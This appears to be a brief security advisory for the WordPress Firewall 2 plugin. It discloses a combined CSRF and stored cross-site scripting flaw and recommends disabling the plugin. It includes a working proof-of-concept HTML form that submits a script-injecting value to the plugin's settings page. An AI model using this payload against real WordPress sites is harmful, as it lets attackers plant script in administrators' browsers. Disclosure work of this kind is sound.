HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.
Proof of concept
Visit the following page, click on the submit button, then visit the plugin’s options page:
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php"> <input type="text" name="email_address" value=""><script>alert(1)</script>"> <input type="text" name="set_email" value="Set Email"> <input type="submit"> </form>
In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.
Disable the plugin until a new version is released that fixes this bug.